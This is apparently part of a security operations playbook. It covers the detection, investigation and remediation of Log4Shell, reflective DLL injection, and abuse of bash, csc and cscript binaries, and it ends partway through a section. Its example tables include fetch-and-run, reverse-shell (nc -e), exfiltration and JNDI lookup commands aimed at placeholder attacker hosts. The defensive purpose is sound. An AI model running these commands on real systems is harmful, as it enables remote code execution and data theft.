Part 6
Some of SOPs
π¨ Signed Binary Proxy Execution: Bash.exe or Gitbash.exe
π 1. Attack Breakdown
π What is Signed Binary Proxy Execution (Bash.exe or Gitbash.exe)?
Signed Binary Proxy Execution is a technique where attackers use legitimate signed binaries (e.g.,
bash.exefrom Windows Subsystem for Linux (WSL) orgitbash.exe) to proxy malicious commands or payloads.These binaries are trusted by the operating system and security solutions, making them ideal for evading detection.
π Why Attackers Use Bash.exe or Gitbash.exe?
Trusted Binaries: Binaries are signed by trusted vendors (Microsoft or Git).
Evasion: Antivirus and security solutions may overlook these processes.
Command Execution: Can execute arbitrary commands or scripts.
Living Off the Land: Reduces the need for downloading additional tools.
Persistence: Can create scheduled tasks or maintain backdoors.
π Common Attack Scenarios
Scenario
Description
Example Command
Execute Malicious Scripts via Bash
Run payloads using Bash.
bash.exe -c "curl http://malicious.com -o /tmp/payload.sh; bash /tmp/payload.sh"
Proxy Commands via Gitbash
Run malicious commands via Gitbash.
gitbash.exe -c "wget http://malicious.com/payload.sh; chmod +x payload.sh; ./payload.sh"
Download and Execute Payloads
Use bash to download and run payloads.
`bash.exe -c "wget -O- http://malicious.com/script.sh
Persistence Using Scheduled Tasks
Use Bash to create persistence.
`schtasks /create /tn UpdateTask /tr "bash.exe -c 'curl http://malicious.com/update.sh
π Tools Commonly Abused
Tool
Purpose
bash.exe
Command execution from Windows Subsystem for Linux (WSL)
gitbash.exe
Command execution via Git Bash
curl/wget
Downloading payloads
chmod
Modify file permissions
sh/bash
Execute shell scripts
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ Identify Processes Involving Bash or Gitbash
Get-Process | Where-Object { $_.Path -like "*bash.exe" -or $_.Path -like "*gitbash.exe" }π΅οΈ Inspect Command-Line Arguments
Get-CimInstance Win32_Process | Where-Object { $_.CommandLine -like "*bash*" -or $_.CommandLine -like "*wget*" }π΅οΈ Monitor Downloads via Bash or Gitbash
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*wget*" -or $_.Message -like "*curl*" }π΅οΈ Inspect Parent-Child Relationships
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -ne 0 -and $_.Name -like "*bash.exe*" }π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Suspicious Bash or Gitbash Execution
DeviceProcessEvents
| where FileName in ("bash.exe", "gitbash.exe")
| where ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Monitor Payload Downloads via Bash/Gitbash
DeviceNetworkEvents
| where InitiatingProcessFileName in ("bash.exe", "gitbash.exe")
| where RemoteUrl contains "http"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, AccountNameπ΅οΈ Identify Bash Processes in Suspicious Folders
DeviceProcessEvents
| where FileName in ("bash.exe", "gitbash.exe")
| where FolderPath contains "Temp" or FolderPath contains "AppData"
| project Timestamp, DeviceName, ProcessCommandLine, FolderPath, AccountNameπ΅οΈ Trace Parent-Child Process Relationships
DeviceProcessEvents
| where ParentProcessFileName contains "explorer.exe" or ParentProcessFileName contains "cmd.exe"
| where FileName in ("bash.exe", "gitbash.exe")
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountNameπ΅οΈ Identify Scheduled Tasks Using Bash or Gitbash
DeviceProcessEvents
| where ProcessCommandLine contains "schtasks"
| where ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "gitbash.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., bash.exe, gitbash.exe).
4663
Object access attempt (e.g., file download or script execution).
4656
Handle to an object was requested (e.g., script file handle).
7045
A service was installed on the system (e.g., persistence with bash).
π Focus on Event ID 4688:
Look for:
ProcessCommandLine: bash.exe -c "wget http://malicious.com/script.sh" ProcessCommandLine: gitbash.exe -c "curl http://malicious.com/payload.sh"
π Focus on Event ID 7045:
Check for scheduled tasks or services involving
bash.exeorgitbash.exe.
π΅οΈ 3. Investigation Techniques
1οΈβ£ Trace Bash or Gitbash Execution History
Check recently executed bash commands:
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*bash.exe*" }2οΈβ£ Inspect Script Files Called by Bash or Gitbash
List script files in suspicious directories:
Get-ChildItem -Path "C:\Temp", "C:\Users\Public" -Include *.sh, *.txt, *.dat -Recurse3οΈβ£ Trace Parent-Child Process Tree
Identify suspicious parent processes:
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }4οΈβ£ Inspect Registry for Persistence Mechanisms
Check Scheduled Tasks:
schtasks /query /fo LIST /v | findstr "bash.exe gitbash.exe"π§ 4. Remediation Steps
π 1. Terminate Malicious Processes
Stop-Process -Name "bash" -Force
Stop-Process -Name "gitbash" -Forceπ 2. Remove Malicious Scripts
Remove-Item -Path "C:\Temp\payload.sh" -Forceπ 3. Disable Bash or Gitbash for Untrusted Users
icacls "C:\Windows\System32\bash.exe" /deny Everyone:RXπ 4. Clear Scheduled Tasks Involving Bash/Gitbash
schtasks /delete /tn UpdateTask /fπ 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Monitor Bash/Gitbash Execution:
Alert on
wget,curl, or suspicious arguments.
Implement Application Control (AppLocker/WDAC):
Restrict access to
bash.exeandgitbash.exe.
Disable WSL if Not Needed:
Disable-WindowsOptionalFeature -FeatureName Microsoft-Windows-Subsystem-LinuxMonitor Scheduled Tasks:
Regularly audit tasks involving
bash.exeorgitbash.exe.
Train Users:
Educate about suspicious script execution.
π§ 6. Key Takeaways
Signed Binaries Are Trusted: Attackers exploit
bash.exeandgitbash.exefor stealth.Monitor Command Arguments: Look for
curl,wget, and script downloads.Focus on Persistence Mechanisms: Scheduled tasks and startup folders.
Event IDs to Monitor: 4688, 4663, 7045.
π¨ Log4j Invocation: Advanced Threat Analysis
π 1. Attack Breakdown
π What is Log4j?
Log4j is a widely used Java-based logging library developed by the Apache Software Foundation.
The Log4Shell (CVE-2021-44228) vulnerability allows remote code execution (RCE) by exploiting how Log4j handles JNDI lookups.
Attackers can send specially crafted payloads, often containing
${jndi:ldap://attacker-controlled-server/payload}to vulnerable applications, enabling arbitrary code execution.
π Why is Log4j Dangerous?
Widespread Usage: Many enterprise and open-source applications rely on Log4j.
Remote Code Execution (RCE): Allows attackers to run arbitrary code.
Minimal Footprint: Exploit can be triggered with a simple HTTP request or log entry.
Persistent Access: Attackers can install backdoors or malware.
Stealthy: Exploits are often buried in legitimate logs.
π Common Attack Scenarios
Technique
Description
Example Payload
LDAP RCE
Execute remote payloads via LDAP.
${jndi:ldap://attacker.com:1389/Exploit}
DNS Exfiltration
Data exfiltration using DNS queries.
${jndi:dns://attacker.com/exfiltrate}
Remote Shell
Trigger remote shell execution.
${jndi:rmi://attacker.com:1099/ReverseShell}
Local Execution
Local execution bypassing detection.
${jndi:ldap://127.0.0.1/payload}
π‘οΈ 2. Detection Techniques
π Manual Inspection with Logs
π΅οΈ Search for Suspicious Log4j Patterns in Logs
grep -i -E '\$\{jndi:(ldap|rmi|dns)://[^\s]+' /var/log/*.logπ΅οΈ Identify Suspicious User-Agent Strings
grep -i -E 'jndi:ldap|jndi:rmi|jndi:dns' /var/log/apache2/access.logπ΅οΈ Analyze Application-Specific Logs (Java-based Apps)
cat /path/to/application/logs | grep -E '\$\{jndi:(ldap|rmi|dns)}'π΅οΈ Inspect System Logs for Malicious Processes Triggered by Java Applications
ps aux | grep -i javaπ Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Suspicious JNDI Strings in Logs
DeviceFileEvents
| where FileName endswith ".log"
| where FileContent contains "${jndi:ldap" or FileContent contains "${jndi:rmi"
| project Timestamp, DeviceName, FileName, FolderPath, AccountNameπ΅οΈ Monitor Network Connections to Suspicious LDAP Servers
DeviceNetworkEvents
| where RemoteUrl contains "ldap://" or RemoteUrl contains "rmi://"
| where RemoteIP !startswith "192.168." and RemoteIP !startswith "10."
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, AccountNameπ΅οΈ Identify Java Processes with Suspicious Command Line Arguments
DeviceProcessEvents
| where FileName == "java.exe"
| where ProcessCommandLine contains "jndi:"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Monitor Suspicious Java Child Processes
DeviceProcessEvents
| where ParentProcessFileName == "java.exe"
| where FileName in ("cmd.exe", "powershell.exe", "curl.exe", "wget.exe")
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Trace Log4j Exploit Patterns in Web Requests
DeviceWebContentEvents
| where Url contains "${jndi:"
| project Timestamp, DeviceName, Url, AccountNameπ Event Viewer Logs
Event ID
Description
4688
New process creation (e.g., spawned from Java).
4656
Handle to an object was requested (e.g., access to sensitive files).
4663
Object access attempt (e.g., files/scripts executed).
5156
Network connection allowed (e.g., outbound LDAP/DNS traffic).
4104
PowerShell script block logging.
π Focus on Event ID 4688:
Look for:
ProcessCommandLine: java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
π Focus on Event ID 5156:
Identify outbound connections to LDAP/RMI servers:
RemoteIP: ldap://attacker.com
π΅οΈ 3. Investigation Techniques
1οΈβ£ Trace Java Processes
Identify active Java processes:
ps aux | grep java2οΈβ£ Inspect Java Application Logs
Look for JNDI patterns:
grep -r '${jndi:' /var/log3οΈβ£ Check Firewall Logs for Suspicious LDAP/DNS Traffic
Identify connections to uncommon LDAP or DNS servers.
4οΈβ£ Network Traffic Analysis
Use tools like Wireshark or Zeek to inspect suspicious outbound connections.
π§ 4. Remediation Steps
π 1. Patch and Update Log4j
Update Log4j to version 2.17.1 or later:
sudo apt-get update && sudo apt-get upgrade log4jπ 2. Disable JNDI Lookups
Add the following parameter:
Dlog4j2.formatMsgNoLookups=trueπ 3. Block Outbound LDAP and RMI Traffic
iptables -A OUTPUT -p tcp --dport 389 -j DROP
iptables -A OUTPUT -p tcp --dport 1099 -j DROPπ 4. Remove Suspicious Artifacts
Delete malicious payloads:
find / -type f -name '*.class' -exec rm -f {} +π 5. Rotate Credentials and Secrets
Rotate all credentials used in impacted systems.
π 6. Perform Full Antivirus Scan
clamscan -r /var/logπ‘οΈ 5. Prevention Steps
Keep Systems and Software Updated:
Regularly patch Log4j and related dependencies.
Disable JNDI Lookups Globally:
Use JVM options to prevent remote lookups.
Network Monitoring:
Block outbound LDAP and RMI connections.
Enable Logging and Alerts:
Enable detection for
${jndi:patterns in logs.
Enable Web Application Firewall (WAF):
Block Log4j payload patterns via WAF rules.
Limit Java Process Privileges:
Run Java processes with minimal privileges.
π§ 6. Key Takeaways
Log4j Is a Critical Vulnerability: Immediate patching is essential.
Look for JNDI Patterns:
${jndi:ldap},${jndi:rmi}in logs and network traffic.Focus on Event IDs: 4688, 4656, 5156, 4663.
Disable JNDI Lookup if Unused: Add JVM parameters to prevent exploitation.
Monitor Outbound LDAP/DNS Traffic: Track external communication.
π¨ Reflective DLL Injection
π 1. Attack Breakdown
π What is Reflective DLL Injection?
Reflective DLL Injection is a stealthy technique where a DLL (Dynamic Link Library) is loaded directly into a processβs memory without using the standard Windows API
LoadLibrary()function.This technique avoids leaving traces on disk, making it difficult for antivirus software and endpoint security solutions to detect.
π Why Attackers Use Reflective DLL Injection?
Stealth: No need to drop a DLL file on disk.
Evasion: Bypasses standard API hooks and antivirus detections.
Persistence: Can be used to inject malicious DLLs into persistent processes.
Flexibility: Can be used in both local and remote process injections.
π How Reflective DLL Injection Works
Payload Delivery: The attacker delivers a malicious DLL to the target system.
Map DLL in Memory: Allocate memory in the target process.
Write DLL to Memory: Copy the DLL into the allocated memory.
Find Entry Point: Locate the
DllMainentry point of the DLL.Execute Entry Point: Call
DllMainmanually.
π Common Tools for Reflective DLL Injection
Tool
Description
Metasploit
Framework for delivering reflective DLLs.
Cobalt Strike
Advanced penetration testing toolkit.
PowerSploit
PowerShell scripts for injection.
Mimikatz
Credential dumping and lateral movement.
Empire
Post-exploitation framework.
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ Identify Suspicious Memory Allocation in Processes
Get-Process | Where-Object { $_.PagedMemorySize -gt 100MB } | Select-Object Name, Id, PagedMemorySizeπ΅οΈ Inspect Processes with RWX Memory Permissions
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=10} | Where-Object { $_.Message -like "*RWX*" }π΅οΈ Identify Suspicious DLL Injections via Threads
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*VirtualAlloc*" -or $_.Message -like "*WriteProcessMemory*" }π΅οΈ Check Uncommon DLL Paths in MemoryGet-Process | Where-Object { $_.Modules -match "Temp" }
π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Suspicious Memory Allocation
DeviceProcessEvents
| where ProcessCommandLine contains "VirtualAlloc"
| where ProcessCommandLine contains "WriteProcessMemory"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Identify Processes with Suspicious DLL Paths
DeviceImageLoadEvents
| where FolderPath contains "Temp" or FolderPath contains "AppData"
| where FileName endswith ".dll"
| project Timestamp, DeviceName, FileName, FolderPath, AccountNameπ΅οΈ Look for Suspicious API Calls
DeviceProcessEvents
| where ProcessCommandLine contains "CreateRemoteThread"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountNameπ΅οΈ Monitor DLL Injection via Known Tools
DeviceProcessEvents
| where ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "powershell"
| where ProcessCommandLine contains "DllRegisterServer"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Identify Thread Injection Activity
DeviceProcessEvents
| where ProcessCommandLine contains "CreateRemoteThread"
| where ProcessCommandLine contains "VirtualAlloc"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., rundll32.exe).
4689
Process termination (trace exits).
4656
Handle to an object was requested.
10
Sysmon event for memory allocation (RWX).
5156
Network connection allowed.
π Focus on Event ID 10 (Sysmon):
Look for:
RuleName: Memory Allocation Details: RWX memory permissions
π Focus on Event ID 4688:
Track processes created with reflective DLL payloads:
CommandLine: rundll32.exe malicious.dll
π΅οΈ 3. Investigation Techniques
1οΈβ£ Analyze Memory with Volatility Framework
volatility -f memorydump.img --profile=Win10x64 malfind2οΈβ£ Inspect Process Modules
Review loaded DLLs:
Get-Process -Id <PID> -Module3οΈβ£ Inspect RWX Memory Regions
Check memory permissions:
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=10}4οΈβ£ Trace Parent-Child Processes
Identify the parent process:
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }π§ 4. Remediation Steps
π 1. Terminate Malicious Processes
Stop-Process -Id <PID> -Forceπ 2. Dump and Analyze Memory
Create a memory dump for further analysis:
procdump -ma <PID> malicious_process.dmpπ 3. Remove Malicious DLLs
Remove-Item -Path "C:\Temp\malicious.dll" -Forceπ 4. Block Suspicious API Calls
Use Windows Defender Exploit Guard to monitor API usage.
π 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Enable Sysmon with Rule for RWX Memory Regions:
Monitor
VirtualAllocandWriteProcessMemory.
Implement Application Control Policies:
Block untrusted DLLs using AppLocker.
Restrict Memory Allocation Permissions:
Limit
VirtualAlloccalls from untrusted processes.
Enable Behavioral Analytics in EDR Solutions:
Monitor thread injection behavior.
Keep Systems Patched and Updated:
Apply security updates regularly.
π§ 6. Key Takeaways
Reflective DLL Injection is Stealthy: Difficult to detect via standard tools.
Monitor RWX Memory Regions: Sysmon Event ID 10 is crucial.
Focus on Parent-Child Process Relationships: Check API calls like
VirtualAllocandCreateRemoteThread.Use Threat Intelligence Tools: Validate DLL hashes on VirusTotal.
π¨ Detected Non-Baselined Csc.exe Parent Process
π 1. Attack Breakdown
π What is Csc.exe?
Csc.exe (C# Compiler) is a legitimate Microsoft binary located in
C:\Windows\Microsoft.NET\Framework\<version>\csc.exe.It is used by the .NET Framework to compile C# code into executables or DLLs.
π Why is Csc.exe Abused by Attackers?
Trusted Binary: Signed by Microsoft, reducing suspicion.
Execution Proxy: Can execute malicious C# payloads without being flagged.
Fileless Execution: Execute code directly from memory.
Evasion: Avoid detection by hiding behind a legitimate process.
Persistence: Can be used in scheduled tasks or registry entries.
π Common Attack Scenarios
Technique
Description
Example Command
Code Compilation from Temp Directory
Compile and run malicious C# code from Temp.
csc.exe /out:C:\Temp\malware.exe C:\Temp\script.cs
Reflective Code Execution
Reflectively execute C# code in memory.
csc.exe -r:System.dll -r:System.Net.dll C:\Temp\exploit.cs
Scheduled Task with Csc.exe
Persistence through scheduled tasks.
schtasks /create /tn "UpdateTask" /tr "csc.exe /out:C:\Temp\malware.exe C:\Temp\script.cs" /sc daily
Obfuscated Commands
Use obfuscation to avoid detection.
csc.exe /target:winexe /out:%TEMP%\payload.exe script.cs
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ List Active Csc.exe Processes
Get-Process -Name csc | Select-Object Id, ProcessName, Path, StartTimeπ΅οΈ Inspect Csc.exe Parent Processes
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "csc.exe" } | Select-Object ProcessId, ParentProcessId, CommandLineπ΅οΈ Check Recent Csc.exe Executions
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*csc.exe*" }π΅οΈ List Suspicious Csc.exe Files in Temp or Public Directories
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public" -Filter "csc.exe" -Recurseπ΅οΈ Analyze Compiled Executables
Get-ChildItem -Path "C:\Temp" -Filter "*.exe" | Select-Object FullName, LastWriteTimeπ Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Suspicious Csc.exe Parent Processes
DeviceProcessEvents
| where FileName == "csc.exe"
| where ParentProcessFileName !in ("cmd.exe", "powershell.exe", "explorer.exe", "msbuild.exe")
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessFileName, AccountNameπ΅οΈ Identify Csc.exe Execution from Non-Standard Directories
DeviceProcessEvents
| where FileName == "csc.exe"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, AccountNameπ΅οΈ Detect Csc.exe Compiling Code from Suspicious Files
DeviceFileEvents
| where FileName endswith ".cs"
| where FolderPath contains "Temp" or FolderPath contains "AppData"
| project Timestamp, DeviceName, FileName, FolderPath, AccountNameπ΅οΈ Monitor Suspicious Csc.exe Network Connections
DeviceNetworkEvents
| where InitiatingProcessFileName == "csc.exe"
| where RemoteIP !startswith "192.168."
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, AccountNameπ΅οΈ Scheduled Task with Csc.exe
DeviceProcessEvents
| where ProcessCommandLine contains "schtasks"
| where ProcessCommandLine contains "csc.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
New process creation (csc.exe)
4663
Object access attempt
4656
Handle to an object requested
7045
New service installed on the system
π Focus on Event ID 4688:
Look for:
ProcessName: csc.exe ParentProcess: powershell.exe, cmd.exe, msbuild.exe CommandLine: csc.exe /out:C:\Temp\payload.exe C:\Temp\exploit.cs
π Focus on Event ID 7045:
Look for scheduled tasks or services using
csc.exe.
π΅οΈ 3. Investigation Techniques
1οΈβ£ Trace Parent-Child Relationships
Identify the parent process:
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }2οΈβ£ Analyze Command-Line History
Review recent commands involving
csc.exe:
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*csc.exe*" }3οΈβ£ Check for Temporary C# Files
Look for
.csfiles in temporary directories:
Get-ChildItem -Path "C:\Temp" -Filter "*.cs"4οΈβ£ Review Network Activity
Analyze network activity from
csc.exe:
netstat -ano | findstr <PID>π§ 4. Remediation Steps
π 1. Terminate Malicious Processes
Stop-Process -Name "csc" -Forceπ 2. Remove Malicious C# Scripts
Remove-Item -Path "C:\Temp\exploit.cs" -Forceπ 3. Disable Csc.exe Execution in User Directories
Create AppLocker policy:
New-AppLockerPolicy -RuleType Deny -Path "C:\Users\*\AppData\*\csc.exe"π 4. Audit Scheduled Tasks
schtasks /query /fo LIST /vπ 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Enable Command-Line Auditing:
Monitor
csc.exearguments.
Implement Application Control Policies:
Block unauthorized
csc.exeusage.
Restrict Access to Compiler Binaries:
Limit access to
csc.exe.
Patch Systems Regularly:
Ensure .NET Framework is updated.
Enable Behavioral Analytics in EDR:
Detect abnormal
csc.exebehavior.
π§ 6. Key Takeaways
Monitor Non-Standard Parent Processes: Investigate unexpected parents for
csc.exe.Focus on Event IDs: 4688, 4663, 7045.
Monitor Temporary Directories: Look for
.csand.exefiles.Apply Application Control Policies: Block unauthorized compiler access.
π¨ Cscript Launching CMD or PowerShell
π 1. Attack Breakdown
π What is Cscript.exe?
Cscript.exe is the Command-Line Script Host used to execute VBScript (.vbs) and JScript (.js) files on Windows systems.
Itβs a legitimate Microsoft binary located in
C:\Windows\System32\cscript.exe.
π Why Attackers Abuse Cscript.exe?
Trusted Binary: Signed by Microsoft and often allowed by security tools.
Script Execution: Can run
.vbsand.jsscripts silently.Proxy Execution: Attackers use it to launch cmd.exe or powershell.exe for further malicious activities.
Evasion: Script execution can be obfuscated to avoid detection.
Persistence: Used in scheduled tasks or startup entries.
π Common Attack Scenarios
Technique
Description
Example Command
Launch CMD via VBScript
Run commands using CMD from a VBScript.
cscript.exe script.vbs
Launch PowerShell via VBScript
Run PowerShell commands via VBScript.
cscript.exe payload.vbs
Obfuscated Payloads
Hide malicious commands in an obfuscated script.
cscript.exe /nologo C:\Temp\obfuscated.vbs
Persistence via Scheduled Task
Run a VBScript periodically to launch CMD/PowerShell.
schtasks /create /tn UpdateTask /tr "cscript.exe script.vbs" /sc daily
Fileless Execution
Execute scripts in memory without leaving traces on disk.
cscript.exe //e:vbscript -
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ Identify Active Cscript Processes
Get-Process -Name cscript | Select-Object Id, ProcessName, Path, StartTimeπ΅οΈ Inspect Cscript Launching CMD or PowerShell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object {
$_.Message -like "*cscript.exe*" -and ($_.Message -like "*cmd.exe*" -or $_.Message -like "*powershell.exe*")
}π΅οΈ Check VBScript Files in Suspicious Directories
Get-ChildItem -Path "C:\Users\Public", "C:\Windows\Temp" -Include *.vbs -Recurseπ΅οΈ Identify Obfuscated VBScript Execution
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'} | Where-Object {
$_.Message -like "*cscript.exe*" -and $_.Message -like "*-EncodedCommand*"
}π΅οΈ Inspect Parent-Child Relationship
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq (Get-Process -Name "cscript").Id }π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Cscript Launching CMD or PowerShell
DeviceProcessEvents
| where FileName == "cscript.exe"
| where ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountNameπ΅οΈ Identify Suspicious Cscript Script Execution
DeviceFileEvents
| where FileName endswith ".vbs" or FileName endswith ".js"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FileName, FolderPath, AccountNameπ΅οΈ Trace Parent-Child Relationships
DeviceProcessEvents
| where FileName == "cmd.exe" or FileName == "powershell.exe"
| where InitiatingProcessFileName == "cscript.exe"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountNameπ΅οΈ Detect Obfuscated Commands via Cscript
DeviceProcessEvents
| where FileName == "cscript.exe"
| where ProcessCommandLine contains "-EncodedCommand"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Monitor Scheduled Tasks Involving Cscript
DeviceProcessEvents
| where FileName == "schtasks.exe"
| where ProcessCommandLine contains "cscript.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (cscript.exe).
4663
Object access attempt (script file access).
4104
PowerShell script block execution.
7045
A new service was installed.
π Focus on Event ID 4688:
Look for:
ProcessCommandLine: cscript.exe script.vbs ProcessCommandLine: cscript.exe payload.js ParentProcess: cmd.exe or powershell.exe
π Focus on Event ID 4104:
Look for obfuscated payload execution via PowerShell.
π΅οΈ 3. Investigation Techniques
1οΈβ£ Trace Script Origin
Inspect script file metadata:
Get-ItemProperty -Path "C:\Temp\script.vbs"2οΈβ£ Analyze Parent-Child Process Tree
Trace back the initiating process:
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }3οΈβ£ Check Scheduled Tasks for Script Execution
Look for scheduled tasks invoking Cscript:
schtasks /query /fo LIST /v | findstr "cscript.exe"4οΈβ£ Validate Script File Hashes
Generate file hash and compare on VirusTotal:
Get-FileHash -Path "C:\Temp\script.vbs" -Algorithm SHA256π§ 4. Remediation Steps
π 1. Terminate Malicious Processes
Stop-Process -Name "cscript" -Forceπ 2. Remove Malicious Script Files
Remove-Item -Path "C:\Temp\malicious.vbs" -Forceπ 3. Disable Windows Script Host
reg add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v Enabled /t REG_DWORD /d 0 /fπ 4. Audit Scheduled Tasks
schtasks /delete /tn "UpdaterTask" /fπ 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Disable Windows Script Host (If Unused).
Enable Command Line Auditing.
Monitor Scheduled Tasks for Script Execution.
Block Obfuscated Scripts via AppLocker.
Regularly Audit Script Files in Temp and Public Folders.
π¨ Payload Performing Network Activity
π 1. Attack Breakdown
π What is a Network Payload Activity?
Payloads performing network activity are malicious programs/scripts that:
Communicate with Command and Control (C2) servers.
Exfiltrate sensitive data from the target system.
Download additional payloads or tools.
Establish persistence by maintaining a communication channel with the attacker.
π Why Attackers Use Network Payloads?
Remote Control: Execute commands remotely on compromised systems.
Exfiltration: Transfer sensitive data to external servers.
Obfuscation: Hide network communication using encryption or legitimate services.
Pivoting: Use the compromised host as a gateway to access other systems.
Reconnaissance: Map the network infrastructure.
π Common Attack Scenarios
Technique
Description
Example Command
Download Additional Payloads
Use HTTP/S to download malicious tools.
powershell.exe -c "Invoke-WebRequest -Uri http://malicious.com/payload.exe"
C2 Communication
Establish persistent communication with a C2 server.
nc -e cmd.exe attacker.com 4444
Data Exfiltration
Transfer files to an external server.
curl -T sensitive_data.zip http://attacker.com/upload
DNS Tunneling
Covert communication via DNS requests.
nslookup -type=txt secret.attacker.com
Proxying Traffic
Use compromised systems as a proxy.
ssh -R 8080:localhost:80 attacker.com
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ List Processes with Active Network Connections
Get-Process | Where-Object { $_.Name -in @("powershell", "cmd", "wscript", "cscript") } |
ForEach-Object { $_.Id } |
ForEach-Object { Get-NetTCPConnection -OwningProcess $_ }π΅οΈ Inspect Recent Connections to External IPs
Get-NetTCPConnection | Where-Object { $_.RemoteAddress -notlike "192.168.*" -and $_.RemoteAddress -notlike "10.*" }π΅οΈ Check Outbound Connections Using CMD or PowerShell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object {
$_.Message -like "*powershell*" -or $_.Message -like "*cmd*" -and $_.Message -like "*http*"
}π΅οΈ Identify Scripts Making Network Calls
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public" -Include *.ps1, *.bat, *.vbs -Recurse |
Select-String -Pattern "Invoke-WebRequest", "curl", "wget"π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Network Activity from Suspicious Processes
DeviceNetworkEvents
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| where RemoteIP != "127.0.0.1" and RemoteIP != "::1"
| where RemoteIP !startswith "192.168." and RemoteIP !startswith "10."
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, RemotePort, ProcessCommandLine, AccountNameπ΅οΈ Monitor HTTP/S Traffic from Suspicious Processes
DeviceNetworkEvents
| where RemoteUrl contains "http" or RemoteUrl contains "https"
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| project Timestamp, DeviceName, RemoteUrl, ProcessCommandLine, AccountNameπ΅οΈ Identify DNS Exfiltration Patterns
DeviceNetworkEvents
| where RemoteUrl contains ".attacker.com"
| where Protocol == "DNS"
| project Timestamp, DeviceName, RemoteUrl, AccountNameπ΅οΈ Look for Obfuscated Network Commands
DeviceProcessEvents
| where ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "curl"
| where ProcessCommandLine contains "-EncodedCommand"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Trace Network Payloads from Scripts
DeviceProcessEvents
| where FileName in ("powershell.exe", "cmd.exe", "cscript.exe", "wscript.exe")
| where ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., cmd.exe, powershell.exe).
5156
A network connection was allowed.
4663
Object access attempt detected.
4104
PowerShell script block logging.
π Focus on Event ID 4688:
Look for:
